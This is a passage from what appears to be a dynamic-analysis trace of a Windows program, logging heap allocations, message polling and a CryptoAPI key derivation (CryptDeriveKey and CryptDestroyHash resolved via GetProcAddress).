Size=0x8) returned 0x2e55088 [0230.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0230.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0230.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0230.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0230.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0230.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0230.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0230.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0230.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0230.858] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0230.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0230.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0230.858] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0230.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0230.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0230.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0230.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0230.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0230.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0230.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0230.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0230.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0230.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0230.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0230.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0230.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0230.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0230.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0230.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0230.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0230.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0230.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0230.859] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0230.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0230.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0230.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0230.859] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0230.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0230.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0230.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0230.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0230.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0230.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0230.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0230.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0230.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0230.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0230.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0230.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0230.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0230.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0230.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0230.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0230.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0230.861] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0230.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0230.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0230.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0230.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0230.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0230.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0230.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0230.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0230.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0230.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0230.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0230.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0230.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0230.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0230.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0230.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0230.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0230.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0230.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0230.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0230.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0230.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0230.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0230.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0230.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0230.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0230.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0230.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0230.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0230.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0230.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0230.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0230.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0230.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0230.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0230.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0230.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0230.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0230.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0230.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0230.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0230.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0230.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0230.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0230.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0230.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0230.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0230.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0230.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51598 [0230.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51598, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0230.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0230.863] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0230.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0230.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0230.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0230.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0230.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0230.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0230.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0230.864] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87490, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87310) returned 1 [0230.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0230.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0230.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0230.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0230.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0230.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0230.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0230.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0230.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0230.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0230.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0230.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0230.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0230.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0230.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0230.866] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0230.866] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0230.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0230.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0230.866] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.866] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0230.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0230.866] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0230.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0230.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0230.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0230.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0230.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0230.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0230.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0230.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0230.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0230.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0230.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0230.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0230.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0230.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0230.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0230.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0230.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0230.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69ac8 [0230.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69ac8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0230.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0230.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0230.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0230.867] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0230.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0230.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0230.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0230.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0230.868] CryptDestroyHash (hHash=0xa87490) returned 1 [0230.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0230.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0230.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0230.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0230.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0230.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0230.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0230.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0230.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0230.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 